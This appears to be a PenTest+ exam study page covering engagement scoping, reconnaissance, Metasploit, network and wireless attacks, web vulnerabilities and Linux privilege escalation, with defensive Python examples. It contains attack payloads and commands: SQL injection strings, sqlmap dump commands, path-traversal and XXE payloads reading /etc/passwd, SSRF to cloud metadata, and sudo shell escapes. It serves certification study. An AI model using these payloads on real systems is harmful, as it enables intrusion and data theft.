Study ethical hacking on the go with our IT certification podcast
Nmap tricks, Metasploit walkthroughs, and PenTest+ exam strategies explained for commutes and workouts. New episodes weekly.
PT0-002 Exam Snapshot
| Exam code | PT0-002 |
| Questions | Up to 85 (multiple choice + PBQ) |
| Passing score | 750 / 900 |
| Duration | 165 minutes |
| Exam fee | ~$392 USD |
| Prerequisite | Security+ or equivalent experience recommended |
| Validity | 3 years (renewable via CEUs or retake) |
Domain Weights
Rules of Engagement vs Authorization Letter
The Rules of Engagement (ROE) defines what you can test and how. The authorization letter (get-out-of-jail-free letter) is signed proof of permission. Both are required before any active testing begins. A missing authorization letter exposes the tester to criminal liability — even with the client's verbal approval.
CVSS Scoring — What the Exam Expects
- Critical (9.0–10.0): Remote, unauthenticated, no user interaction, full CIA impact
- High (7.0–8.9): Remote or requires some privilege; significant impact
- Medium (4.0–6.9): Requires local access, user interaction, or limited impact
- Low (0.1–3.9): Minimal exploitability or negligible impact
CVSS v3.1 base metrics: Attack Vector, Attack Complexity, Privileges Required, User Interaction, Scope, Confidentiality, Integrity, Availability.
Course Modules
01
Planning, Scoping & Engagement Setup
3 lessons · ~3h
nmap runs — it starts with paperwork. Get the scope, rules of engagement, and signed authorization right or you become the attacker the client prosecutes. Know the engagement flavors (black/grey/white box), the legal contracts (MSA, SOW, NDA), the compliance drivers (PCI-DSS, HIPAA, SOX, GDPR), and where threat modeling slots in.
Key Concepts
- Black Box: No prior information provided — simulates an external attacker. The tester must discover all targets from scratch through reconnaissance. Most time-consuming but most realistic external threat simulation
- White Box (Crystal Box): Full information provided including network diagrams, source code, credentials, and architecture documentation. Most efficient for thorough testing but least realistic as an adversary simulation
- Gray Box: Partial information — often low-privilege credentials and a basic network map. Balances realism with efficiency. Most common in real-world assessments
- External vs. Internal: External tests target internet-facing systems from outside the network perimeter. Internal tests simulate an insider threat or post-breach attacker from within the network
- Physical Penetration Testing: Tests physical security controls — badge readers, locks, cameras, guard procedures. Includes tailgating, badge cloning, and dumpster diving scenarios
- Social Engineering Assessments: Tests employee susceptibility to phishing, vishing (phone), smishing (SMS), and in-person pretexting. Governed by strict scope rules to avoid harming employees
Key Concepts
- Statement of Work (SOW): Defines deliverables, timelines, milestones, and payment terms. The contractual backbone of the engagement
- Rules of Engagement (ROE): Operational document defining: IP ranges in scope, systems to avoid, allowed attack techniques, testing windows, escalation procedures, and emergency contacts
- Non-Disclosure Agreement (NDA): Protects the client's confidential information. Prevents the tester from disclosing findings to third parties
- Authorization Letter / Get-Out-of-Jail-Free Letter: Written permission signed by an authorized representative. Proves the testing is legally authorized. Must be available during the engagement
- Master Service Agreement (MSA): Umbrella agreement covering all future engagements with a client. Individual engagements are governed by Statements of Work under the MSA
- Third-Party Authorization: Any cloud provider, ISP, or co-location facility must separately authorize testing of shared infrastructure. AWS, Azure, and GCP have formal penetration testing policies
Key Concepts
- STRIDE Threat Model: Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege. Used to classify threats during the planning phase
- PTES (Penetration Testing Execution Standard): Seven-phase framework: pre-engagement, intelligence gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation, reporting
- PCI DSS Requirement 11.3: Mandates penetration testing annually and after significant changes. Requires both external and internal tests. Testers must follow a defined methodology
- NIST SP 800-115: Technical Guide to Information Security Testing. Defines four phases: planning, discovery, attack, reporting
- Bug Bounty Programs: Crowdsourced vulnerability discovery with defined scopes and safe harbor provisions. Differ from traditional pentests in scope, payment structure, and reporting cadence
📋 Scenario — drafting a Rules of Engagement for a black-box test
Situation: A client hires your firm for a black-box external penetration test of their web application. Before any testing begins, you must establish the Rules of Engagement (RoE).
Key RoE clauses to define:
- Scope: "Testing limited to app.client.com and API at api.client.com. Subdomains not listed are out of scope."
- Timing: "Testing permitted 6 PM–6 AM weekdays and all day weekends to minimise production impact."
- Authorization: Client executive signs a written Statement of Work authorising the test — this is your legal protection.
- Communication: "If critical vulnerability found (RCE, SQLi with data access), pause and notify client within 2 hours before further exploitation."
- Data handling: "All data found during testing is treated as confidential and returned/destroyed per Section 4."
- Emergency stop: Two client contacts listed; tester halts immediately if called.
Exam pattern: The PT0-002 exam frequently asks "what should a tester do FIRST?" before an engagement — the answer is always "obtain written authorization" and "define scope". Testing without a signed RoE is unauthorized access regardless of intent.
- No signed authorization = no test. The get-out-of-jail letter with explicit scope, IP ranges, and emergency contacts is the single most important pre-engagement artifact.
- Black box (zero info), grey box (partial info, e.g., creds), white box (full architecture) shape both the test's realism and its budget — the exam asks you to match a scenario to a flavor.
- PCI-DSS mandates pentests annually + after any significant change; HIPAA requires risk assessments but not specifically pentests; SOX cares about financial-reporting controls. Match the regulation to the requirement.
02
Information Gathering & OSINT
3 lessons · ~5h
Key Concepts
- WHOIS: Public registration records revealing registrant name, email, registrar, nameservers, and registration dates. Useful for identifying contacts and associated IP ranges
- DNS Enumeration: Querying DNS records (A, MX, NS, TXT, CNAME) to map the target's infrastructure. DNS zone transfers (AXFR) can expose all internal records if misconfigured
- Google Dorking: Advanced search operators to find indexed sensitive content. Common dorks: `site:target.com filetype:pdf`, `intitle:"index of"`, `site:target.com ext:conf`
- Shodan: Search engine for internet-facing devices. Indexes port/service data, banners, and vulnerabilities. Used passively — queries go to Shodan's database, not the target
- theHarvester: Aggregates email addresses, employee names, subdomains, and IP ranges from search engines, LinkedIn, Shodan, and Hunter.io
- Certificate Transparency Logs: Public records of all SSL/TLS certificates issued. crt.sh reveals all subdomains that have received certificates — including staging, admin, and internal-facing hosts
- LinkedIn / Social Media: Reveals employee names, job titles, technologies in use (from job postings), and organizational structure for social engineering targeting
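Turning a crt.sh result into the subdomain inventory the Certificate Transparency bullet describes, as an added example (not code from the course): the records below are constructed, and the `name_value` / `not_after` field names are assumed to match crt.sh's JSON output. The code dedupes SAN entries, folds wildcards onto the name they cover, rejects look-alike names outside the target domain, and separately lists hosts whose certificates have all expired, which is the stale-host list a defender wants to reconcile against DNS before an attacker finds a forgotten box.

```python
import json
from datetime import datetime

# Constructed crt.sh-style records (not real certificates). Field names are an
# assumption about crt.sh's JSON: name_value carries newline-separated SANs.
SAMPLE_CRTSH_JSON = json.dumps([
    {"common_name": "mail.targetcorp.com",
     "name_value": "mail.targetcorp.com\nwebmail.targetcorp.com",
     "not_before": "2023-01-10T00:00:00", "not_after": "2024-01-10T23:59:59"},
    {"common_name": "*.targetcorp.com",
     "name_value": "*.targetcorp.com\ntargetcorp.com",
     "not_before": "2024-11-01T00:00:00", "not_after": "2025-12-01T23:59:59"},
    {"common_name": "vpn.targetcorp.com",
     "name_value": "VPN.targetcorp.com",
     "not_before": "2024-06-01T00:00:00", "not_after": "2025-06-01T23:59:59"},
    {"common_name": "dev.targetcorp.com",
     "name_value": "dev.targetcorp.com",
     "not_before": "2021-06-01T00:00:00", "not_after": "2022-06-01T23:59:59"},
    {"common_name": "targetcorp.com.evil.example",   # look-alike: must be excluded
     "name_value": "targetcorp.com.evil.example",
     "not_before": "2024-01-01T00:00:00", "not_after": "2025-01-01T23:59:59"},
])


def in_scope(name: str, domain: str) -> bool:
    """The apex itself or any label under it; suffix match on a dot boundary only."""
    return name == domain or name.endswith("." + domain)


def names_with_expiry(json_text: str, domain: str) -> dict:
    """hostname -> latest not_after seen for it across every certificate."""
    latest = {}
    for rec in json.loads(json_text):
        expiry = datetime.fromisoformat(rec["not_after"])
        for raw in rec["name_value"].split("\n"):
            name = raw.strip().lower()
            if name.startswith("*."):
                name = name[2:]            # wildcard: record the parent it covers
            if not in_scope(name, domain):
                continue
            if name not in latest or expiry > latest[name]:
                latest[name] = expiry
    return latest


def subdomains(json_text: str, domain: str) -> list:
    return sorted(names_with_expiry(json_text, domain))


def stale_hosts(json_text: str, domain: str, today_iso: str) -> list:
    """Hosts whose every certificate has expired: review for decommissioned-but-resolving systems."""
    today = datetime.fromisoformat(today_iso)
    return sorted(n for n, exp in names_with_expiry(json_text, domain).items() if exp < today)


if __name__ == "__main__":
    print(subdomains(SAMPLE_CRTSH_JSON, "targetcorp.com"))
    print(stale_hosts(SAMPLE_CRTSH_JSON, "targetcorp.com", "2025-01-01"))
```

The dot-boundary check matters: a plain substring match on "targetcorp.com" would have pulled the look-alike record into scope and put an out-of-scope host on the target list.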
Key Concepts
- Nmap SYN Scan (`-sS`): Half-open scan — sends SYN, receives SYN-ACK (open) or RST (closed), then resets. Stealthier than full connect scan because no application-layer session is established
- Nmap Full Connect Scan (`-sT`): Completes the TCP three-way handshake. Slower and generates application logs. Used when `-sS` is not possible (non-root users)
- Service Version Detection (`-sV`): Probes open ports and identifies the specific service name and version. Critical for identifying outdated, vulnerable software
- NSE (Nmap Scripting Engine): Extends Nmap with hundreds of scripts for vulnerability detection, service enumeration, authentication testing, and exploitation. Scripts are categorized: auth, discovery, vuln, exploit
- Aggressive Mode (`-A`): Enables OS detection, version detection, default scripts, and traceroute in one flag. Not recommended for stealth-sensitive engagements
- Banner Grabbing: Connecting to a service port and reading the initial response. Tools: Netcat (`nc`), Telnet, curl. Reveals service type and version without full scanning
- SMB Enumeration (enum4linux): Retrieves shares, users, groups, password policy, and OS info from Windows systems via NetBIOS/SMB without credentials (if null sessions are permitted)
Key Concepts
- Nessus: Industry-leading vulnerability scanner. Credentialed scans log into systems to check installed software versions, missing patches, configuration flaws, and user account settings — far more thorough than unauthenticated scans
- OpenVAS / Greenbone: Open-source alternative to Nessus. Full vulnerability management platform with web interface, policy management, and reporting
- Nikto: Web server scanner testing for outdated server versions, dangerous HTTP methods, default files, and missing security headers. Not a deep application scanner
- Credentialed vs. Unauthenticated Scans: Credentialed scans require login credentials and examine internal configuration. Unauthenticated scans only see what is exposed over the network — similar to what an external attacker sees
- False Positives and False Negatives: False positives are reported vulnerabilities that do not actually exist. False negatives are real vulnerabilities the scanner missed. Manual verification is always required after automated scanning
- Scan Timing and Throttling: Aggressive scan speeds can trigger IDS/IPS alerts or crash fragile systems. Engagement ROE should specify acceptable scan rates
📋 Scenario — passive OSINT recon before the first packet is sent
Situation: Scope: targetcorp.com. Objective: map the external attack surface before any active scanning. All activity must be passive (no packets sent to the target).
Walk:
1) DNS enumeration: `whois targetcorp.com` (registrar, nameservers, registration dates). `dig targetcorp.com MX` (mail provider — often reveals O365 or Google Workspace). `dig targetcorp.com TXT` (SPF records reveal email infrastructure).
2) Certificate transparency: Search `crt.sh/?q=targetcorp.com` → reveals all subdomains that have had TLS certs issued: mail.targetcorp.com, vpn.targetcorp.com, dev.targetcorp.com.
3) Google dorking: `site:targetcorp.com filetype:pdf` (find public documents). `site:targetcorp.com inurl:admin`.
4) LinkedIn: search the company to map employees, technologies, and org structure. Tech stack often leaks in job postings.
5) Shodan: search the company's IP ranges for exposed services (RDP, SMB, Jenkins, Elasticsearch).
Exam pattern: Passive recon = no packets to target. Active recon = scanning/probing (requires authorization). The exam distinguishes these phases and tests which tools belong to each.
- Passive recon leaves no trace on the target — Google dorks, theHarvester, Shodan, Hunter.io, GitHub search for leaked tokens. Always exhaust passive before going active.
- Active scanning toolkit: `nmap -sS` (SYN stealth) for TCP, `-sU` for UDP, `-sV` for version detection, `-O` for OS fingerprinting, `-T4` for speed (noisier).
- Vulnerability scanners (Nessus, OpenVAS, Nikto for web) generate noise + create CVE lists, not exploits — they're an input to the exploitation phase, not a substitute for it.
03
Network Attacks & Exploitation
3 lessons · ~6h
Key Concepts
- msfconsole Workflow: `search` to find modules → `use` to select → `show options` to view required settings → `set RHOSTS` and `set PAYLOAD` → `check` to verify vulnerability → `run` or `exploit` to execute
- Exploit Modules: Contain the attack code targeting a specific vulnerability in a specific software version. Ranked by reliability: Excellent, Great, Good, Normal, Average, Low, Manual
- Payloads: Code that executes after successful exploitation. Singles (self-contained), Stagers (download larger payload), Stages (downloaded by stager). Common payloads: meterpreter, shell, cmd/unix/interact
- Meterpreter: Advanced in-memory payload providing: file system access, process migration, privilege escalation, keystroke logging, screenshot capture, pivoting, and post-exploitation modules — all without writing to disk
- Post-Exploitation Modules: Run after gaining a session: `post/multi/recon/local_exploit_suggester` for privilege escalation paths, `post/windows/gather/hashdump` for credential extraction
- Sessions: `sessions -l` lists active sessions. `sessions -i [id]` interacts with a session. Background the active session with Ctrl+Z
Key Concepts
- ARP Poisoning / MitM: Sending gratuitous ARP replies to poison victim ARP caches. The victim sends traffic to the attacker instead of the real gateway. Tools: arpspoof, bettercap. Requires LAN access
- Pass-the-Hash (PtH): Using a captured NTLM hash to authenticate to Windows services without cracking the hash. Possible because NTLM authentication uses the hash directly in the challenge-response protocol
- Kerberoasting: Any domain user can request a TGS for any SPN. The TGS is encrypted with the service account's hash and can be cracked offline with Hashcat. High-privilege service accounts with weak passwords are primary targets
- AS-REP Roasting: Targets accounts with Kerberos pre-authentication disabled. These accounts return an AS-REP encrypted with their password hash, which can be cracked offline without any domain credentials
- Password Spraying: Testing one common password (Password1!) across many accounts to avoid lockout. Contrasts with brute-force (many passwords against one account). Effective against default password policies
- Credential Stuffing: Using leaked username/password pairs from data breaches against other services. Exploits password reuse
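The spraying-versus-brute-force distinction above is exactly what a detection rule keys on, so here is that logic run over sample log lines, as an added example that is not part of the course material. The sshd `auth.log` excerpt is constructed (RFC 5737 documentation addresses, invented usernames); the classifier and its thresholds are my own: one source touching many accounts a couple of times each is a spray, one source hammering a single account is brute force, and a user who mistyped twice is left alone.

```python
import re
from collections import defaultdict

FAILED_RE = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

# Constructed sshd auth.log excerpt (not real data): one source cycling through
# six accounts once each, one source hammering root, one legitimate user who
# fat-fingered twice and then succeeded.
SAMPLE_LOG = [
    "Jan 14 10:22:01 bastion sshd[4101]: Failed password for alice from 203.0.113.7 port 51234 ssh2",
    "Jan 14 10:22:03 bastion sshd[4102]: Failed password for bob from 203.0.113.7 port 51235 ssh2",
    "Jan 14 10:22:05 bastion sshd[4103]: Failed password for invalid user carol from 203.0.113.7 port 51236 ssh2",
    "Jan 14 10:22:07 bastion sshd[4104]: Failed password for dave from 203.0.113.7 port 51237 ssh2",
    "Jan 14 10:22:09 bastion sshd[4105]: Failed password for erin from 203.0.113.7 port 51238 ssh2",
    "Jan 14 10:22:11 bastion sshd[4106]: Failed password for frank from 203.0.113.7 port 51239 ssh2",
    "Jan 14 10:45:12 bastion sshd[4301]: Failed password for alice from 192.0.2.4 port 60002 ssh2",
    "Jan 14 10:45:20 bastion sshd[4302]: Failed password for alice from 192.0.2.4 port 60003 ssh2",
    "Jan 14 10:45:31 bastion sshd[4303]: Accepted password for alice from 192.0.2.4 port 60004 ssh2",
] + [
    f"Jan 14 10:30:{i:02d} bastion sshd[{4200 + i}]: Failed password for root "
    f"from 198.51.100.9 port {40000 + i} ssh2"
    for i in range(8)
]


def failures_by_source(lines):
    """ip -> {username: number of failed logins}"""
    counts = defaultdict(lambda: defaultdict(int))
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            counts[m.group("ip")][m.group("user")] += 1
    return counts


def classify_sources(lines, spray_min_users=5, spray_max_per_user=2, brute_min_attempts=5):
    """Label each source IP 'password-spray' (many accounts, few tries each) or
    'brute-force' (one account, many tries); sources below both thresholds are not flagged."""
    verdicts = {}
    for ip, per_user in failures_by_source(lines).items():
        distinct_users = len(per_user)
        total = sum(per_user.values())
        if distinct_users >= spray_min_users and max(per_user.values()) <= spray_max_per_user:
            verdicts[ip] = "password-spray"
        elif distinct_users == 1 and total >= brute_min_attempts:
            verdicts[ip] = "brute-force"
    return verdicts


if __name__ == "__main__":
    for ip, verdict in classify_sources(SAMPLE_LOG).items():
        print(f"{ip}: {verdict}")
```

A production rule additionally buckets by time window (a spray is deliberately slow to stay under lockout thresholds) and correlates across hosts, since the same source will usually walk the whole user list against every exposed service, not just one bastion.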
Key Concepts
- WPA2 PMKID Attack: Modern technique that extracts the PMKID from a single EAPOL frame (no handshake capture needed). The PMKID is computed from the PSK and can be cracked offline. Tools: hcxdumptool + hashcat
- Four-Way Handshake Capture: Classic WPA2 cracking method using airodump-ng + aircrack-ng. Capture the handshake during a client authentication event, then crack offline with a dictionary
- Evil Twin Attack: Rogue AP with same SSID and higher signal strength. Clients roam to attacker's AP. Deploy a captive portal to capture credentials or intercept HTTP traffic
- Deauthentication Attack: Injecting 802.11 deauth frames forces clients to disconnect from the legitimate AP. Combined with evil twin to force reassociation. Tool: aireplay-ng -0
- KARMA Attack: The rogue AP responds to probe requests for any SSID, automatically matching whatever the client is looking for. Exploits the Preferred Network List (PNL)
- Tailgating / Piggybacking: Following an authorized person through a secure door without badging in. Most common physical security bypass. Prevented by mantraps, turnstiles, and security awareness training
- Badge Cloning: Using a Proxmark or similar device to read and clone RFID/HID proximity card data. Many older access control systems use 125kHz cards that have no encryption
📋 Scenario — network scanning and service enumeration (authorized lab)
Situation (authorized internal test): You've confirmed written authorization for the 192.168.1.0/24 segment. Goal: identify live hosts, open ports, and service versions before exploitation.
Walk:
1) Host discovery: `nmap -sn 192.168.1.0/24` → finds live hosts without port scanning (ICMP + ARP).
2) Port scan: `nmap -sS -p- --open -T4 192.168.1.50` (SYN scan, all ports, fast).
3) Service version: `nmap -sV -sC -O 192.168.1.50` (service detection, default scripts, OS fingerprint). Output shows SSH 7.6 (Ubuntu), Apache 2.4.29, SMB open on 445.
4) SMB enumeration: `enum4linux-ng 192.168.1.50` → reveals shares, users, domain info.
5) Vulnerability scan: `nmap --script vuln 192.168.1.50` → flags CVE-2017-0143 (EternalBlue) on port 445.
Exam pattern: Know the difference between -sS (SYN/stealth), -sT (full TCP connect), -sU (UDP), and -sV (version). The exam gives scan output and asks you to identify the scan type or interpret the results.
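Reading scan output is the skill the exam pattern above tests, so here is a parser for Nmap's grepable (`-oG`) format as an added example (my code, not the course's). The sample output is constructed to mirror the scenario's host at 192.168.1.50; each port entry in that format is `port/state/protocol/owner/service/rpc-info/version/`, and the parser turns it into the (host, port, service, version) list that feeds the exploitation phase.

```python
import re

# Constructed nmap grepable (-oG) output, not a real scan.
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated Tue Jan 14 10:00:00 2025 as: nmap -sS -sV -oG scan.gnmap 192.168.1.0/24
Host: 192.168.1.1 ()\tStatus: Up
Host: 192.168.1.1 ()\tPorts: 53/open/tcp//domain//dnsmasq 2.80/, 80/closed/tcp//http///\tIgnored State: filtered (998)
Host: 192.168.1.50 ()\tStatus: Up
Host: 192.168.1.50 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.6p1 Ubuntu 4ubuntu0.3/, 80/open/tcp//http//Apache httpd 2.4.29/, 445/open/tcp//microsoft-ds//\tIgnored State: closed (997)
# Nmap done at Tue Jan 14 10:02:13 2025 -- 256 IP addresses (2 hosts up) scanned in 133.21 seconds
"""

HOST_RE = re.compile(r"^Host: (?P<ip>\S+) \((?P<name>[^)]*)\)")


def parse_gnmap(text: str) -> dict:
    """ip -> {"hostname": str, "ports": [{port, proto, state, service, version}, ...]}"""
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue                      # '#' comment lines and anything unexpected
        entry = hosts.setdefault(m.group("ip"), {"hostname": m.group("name"), "ports": []})
        for field in line.split("\t")[1:]:
            if not field.startswith("Ports: "):
                continue                  # 'Status: Up' and 'Ignored State:' carry no port data
            for item in field[len("Ports: "):].split(", "):
                port, state, proto, _owner, service, _rpc, version = item.split("/")[:7]
                entry["ports"].append({
                    "port": int(port), "proto": proto, "state": state,
                    "service": service, "version": version,
                })
    return hosts


def open_services(hosts: dict) -> list:
    """Flat (ip, port, service, version) list of open ports only."""
    return [
        (ip, p["port"], p["service"], p["version"])
        for ip, entry in hosts.items()
        for p in entry["ports"]
        if p["state"] == "open"
    ]


if __name__ == "__main__":
    for ip, port, service, version in open_services(parse_gnmap(SAMPLE_GNMAP)):
        print(f"{ip}:{port}\t{service}\t{version or '(no version)'}")
```

Splitting each entry on `/` and taking the first seven fields is deliberate: the version string is free text and may be empty (as for the SMB port here), and trailing slashes leave an extra empty element that the slice discards.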
- Metasploit module hierarchy: `exploit/` delivers code → `payload/` runs on target → `auxiliary/` for scanners/fuzzers → `post/` for after-access. Set `RHOSTS`, `LHOST`, `LPORT`, run `exploit`.
- SMB Relay is the network-attack gold standard: capture an NTLM auth from one host, relay it to another without cracking the hash. Requires SMB signing disabled on the relay target.
- Wireless: capture a PMKID or 4-way handshake → crack offline with `hashcat`. Evil Twin is a rogue AP using the same SSID + captive portal to harvest creds; works because users' devices auto-join known SSIDs.
04
Web Application Attacks
3 lessons · ~6h
sqlmap, Burp Suite, ffuf, gobuster.
Key Concepts
- SQL Injection (SQLi): Inserting SQL syntax into application inputs to manipulate the database query. Types: in-band (classic), blind (boolean/time-based when no output is returned), out-of-band (data exfiltrated via DNS/HTTP). Tool: sqlmap automates detection and exploitation
- Authentication Bypass via SQLi: Classic payload `' OR '1'='1` makes the WHERE condition always true, bypassing credential validation without knowing valid credentials
- UNION-Based SQLi: Appends a UNION SELECT statement to the query to retrieve data from other tables. Requires knowing the number of columns in the original query (identify via ORDER BY or error messages)
- OS Command Injection: Unsanitized user input passed to a shell function (`system()`, `exec()`). Shell metacharacters (`;`, `|`, `&&`, `` ` ``) chain additional commands. Can lead to RCE
- Server-Side Template Injection (SSTI): Template engines (Jinja2, Twig, Freemarker) evaluate expressions. If user input is rendered unsanitized, expressions like `{{7*7}}` execute code server-side. Can escalate to full RCE
- LDAP Injection: Manipulating LDAP queries by injecting special characters (`*`, `)`, `(`, `\`) into input fields used to construct LDAP filter strings. Can bypass authentication or dump directory data
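The authentication-bypass bullet side by side with its fix, as an added example (my code, not the course's): a login check built by string formatting against an in-memory SQLite table, and the same check as a parameterised query. The table and the password-hash stand-in are constructed. One caveat the exercise should teach: because AND binds tighter than OR, the page's `' OR '1'='1` payload only flips the whole WHERE clause when it lands in the last comparison (the password field here), which is why the test below shows the username-only variant failing against this particular query shape.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed single-user table; password_hash stands in for a real password hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES ('alice', 'hash-of-alices-password')")
    conn.commit()
    return conn


def rendered_query(username: str, password_hash: str) -> str:
    """The exact SQL the vulnerable path executes: useful as evidence in the finding write-up."""
    return (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password_hash = '{password_hash}'"
    )


def login_vulnerable(conn: sqlite3.Connection, username: str, password_hash: str) -> bool:
    """VULNERABLE: user input is concatenated into the statement and becomes SQL syntax."""
    return conn.execute(rendered_query(username, password_hash)).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password_hash: str) -> bool:
    """FIXED: placeholders; the driver passes values out of band, so quotes stay data."""
    query = "SELECT username FROM users WHERE username = ? AND password_hash = ?"
    return conn.execute(query, (username, password_hash)).fetchone() is not None


if __name__ == "__main__":
    payload = "' OR '1'='1"
    print(rendered_query("nobody", payload))
    print("vulnerable login bypassed:", login_vulnerable(make_db(), "nobody", payload))
    print("parameterised login bypassed:", login_safe(make_db(), "nobody", payload))
```

`rendered_query` is what goes into the evidence section of the report: the client's developers fix bugs faster when they can see `WHERE username = 'nobody' AND password_hash = '' OR '1'='1'` than when they read "SQL injection in the login form".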
Key Concepts
- Reflected XSS: Malicious script is injected into a URL parameter and reflected back in the response without storage. Requires tricking the victim into clicking a crafted link. Common in search boxes and error messages
- Stored XSS: Script is persisted in the server's database and executed for every user who loads the affected page. Higher severity because it does not require social engineering to deliver
- DOM-Based XSS: The vulnerability exists in client-side JavaScript that reads attacker-controlled data (URL hash, query string) and writes it to the DOM unsanitized. No server-side interaction — the server response is benign
- CSRF (Cross-Site Request Forgery): Forces a victim's authenticated browser to make unauthorized state-changing requests to a trusted site. Prevented by anti-CSRF tokens (unique, unpredictable values in every form)
- Clickjacking: Overlays a transparent iframe of the target site over a decoy page. Victim clicks on the decoy but the click goes to the target site. Prevented with X-Frame-Options or Content-Security-Policy: frame-ancestors
- Open Redirect: Application accepts a URL as a redirect parameter without validation. Attackers craft links using the trusted domain that redirect to malicious sites. Used in phishing campaigns
Key Concepts
- Path Traversal (Directory Traversal): Using `../` sequences to access files outside the intended web root. Common payloads: `../../../../etc/passwd`, `..\..\Windows\System32\cmd.exe`. Some filters require URL encoding: `%2e%2e%2f`
- Server-Side Request Forgery (SSRF): Application fetches URLs provided by the user. Attacker supplies internal URLs: AWS metadata endpoint (169.254.169.254), internal APIs, admin interfaces. Can exfiltrate cloud credentials or scan internal networks
- Insecure Direct Object Reference (IDOR): Predictable resource identifiers in URLs or parameters expose other users' data. Changing `?id=1234` to `?id=1235` accesses another user's record. Prevented by authorization checks on every data access
- XML External Entity (XXE): Malicious XML input references an external entity. The XML parser resolves it, reading local files or making HTTP requests. Payload: `<!ENTITY xxe SYSTEM "file:///etc/passwd">`
- Insecure Deserialization: Application deserializes attacker-controlled data. Manipulated serialized objects can trigger arbitrary code execution. Affects Java, PHP, Python, and .NET applications using native serialization
- Security Misconfigurations: Default credentials, exposed admin interfaces, verbose error messages, directory listing enabled, CORS wildcard (`Access-Control-Allow-Origin: *`), HTTP methods (PUT, DELETE) left enabled
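The remediation side of the first two bullets (path traversal and SSRF), as an added example that is not part of the course material: one validator that resolves a user-supplied path under the web root and rejects anything that escapes it, including the URL-encoded and backslash variants listed above, and one that allow-lists outbound fetch targets and refuses internal addresses such as the AWS metadata endpoint even if someone adds them to the allow-list. The web-root path, hostnames and allow-list are constructed; the function names are my own.

```python
import ipaddress
import os
import urllib.parse


def safe_join(web_root: str, requested: str):
    """Resolve a user-supplied relative path under web_root; None if it escapes."""
    decoded = urllib.parse.unquote(requested)          # %2e%2e%2f -> ../
    decoded = decoded.replace("\\", "/")               # treat Windows separators as separators too
    root = os.path.realpath(web_root)
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    # commonpath, not startswith: "/srv/app/public" must not match "/srv/app/public2"
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


BLOCKED_HOSTNAMES = {"localhost", "metadata.google.internal"}


def is_allowed_url(url: str, allowed_hosts) -> bool:
    """Allow-list check for server-side fetches: http(s) only, exact host match,
    and never an internal, loopback or link-local literal (169.254.169.254 included)."""
    parts = urllib.parse.urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    host = (parts.hostname or "").lower()        # hostname, not netloc: strips user@ and :port
    if not host or host in BLOCKED_HOSTNAMES:
        return False
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None                                # a name; DNS answer must still be checked at connect time
    if ip is not None and (ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved):
        return False
    return host in {h.lower() for h in allowed_hosts}


if __name__ == "__main__":
    root = "/srv/app/public"                      # constructed web root
    for req in ("images/logo.png", "../../../../etc/passwd", "%2e%2e%2f%2e%2e%2fetc/passwd"):
        print(f"{req!r:40} -> {safe_join(root, req)}")
    allowed = {"api.partner.example"}
    for url in ("https://api.partner.example/v1/report",
                "http://169.254.169.254/latest/meta-data/",
                "https://api.partner.example@10.0.0.5/"):
        print(f"{url:50} -> {is_allowed_url(url, allowed)}")
```

The `user@host` case in the demo is the one that catches string-prefix filters: the URL starts with the trusted name, but the browser-style parse hands the request to 10.0.0.5. Name-based allow-lists also need the resolved address checked again at connect time (DNS rebinding), and on AWS the page's IMDSv2 note is the second layer: a session token requirement that a naive SSRF cannot satisfy.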
📋 Scenario — testing for SQL injection in a login form (authorized)
Situation (authorized web app test): The target is a login form at https://app.client.com/login. Test for SQL injection using manual probing before running automated tools.
Walk:
1) Manual probe: Enter `'` (single quote) in the username field. If the response changes (SQL error, blank page, different HTML) → potential SQLi.
2) Authentication bypass test: Username: `' OR '1'='1` / Password: anything → if it logs in, the query is vulnerable.
3) Automated confirmation: `sqlmap -u "https://app.client.com/login" --data="user=test&pass=test" --level=3 --risk=2 --batch`. sqlmap confirms the injection point and identifies the DBMS (e.g., MySQL 8.0).
4) Scope check: Before dumping data, confirm with the client whether data exfiltration is in scope. If yes and authorised: `sqlmap ... --dump --tables -D app_db`.
Exam pattern: PT0-002 tests both the manual technique (payloads, error-based detection) and the tool (sqlmap flags). Know that --level controls the number of tests and --risk controls how aggressive they are.
- SQLi flavors: error-based (visible error reveals the schema), union-based (extract via `UNION SELECT`), blind (boolean / time-based — no visible output, infer from response). `sqlmap` automates all three.
- XSS triad: reflected (payload in URL, requires victim click), stored (payload saved server-side, hits every viewer — worst impact), DOM-based (payload executes client-side via JS sink).
- SSRF turns the vulnerable server into your proxy — hit internal services, AWS IMDS (`169.254.169.254`) for instance creds, or pivot to localhost-only admin panels. Defenders block via allow-listed outbound + IMDSv2.
05
Post-Exploitation & Privilege Escalation
2 lessons · ~5h
Key Concepts
- SUID/SGID Binaries: Files with SUID set run as the file owner (often root). Discovery: `find / -perm -4000 -type f 2>/dev/null`. GTFOBins documents escape techniques for SUID binaries including vim, find, python, awk, and nmap
- Sudo Misconfigurations: `sudo -l` lists allowed commands. Running allowed binaries with sudo that spawn shells (e.g., `sudo vim` then `:!/bin/bash`) grants root access
- Cron Job Hijacking: World-writable scripts or binaries called by root-owned cron jobs. Replace or modify the script content to add a SUID binary or reverse shell
- Writable /etc/passwd: If the file is world-writable, add a new root user entry with a known password hash. Rare but high impact when found
- Kernel Exploits: Exploiting unpatched kernel CVEs (Dirty COW CVE-2016-5195, GameOver(lay) CVE-2023-2640). Check kernel version with `uname -r` and research applicable exploits
- PATH Hijacking: If a SUID binary calls another program by relative path, placing a malicious binary earlier in PATH causes the malicious version to execute with elevated privileges
Key Concepts
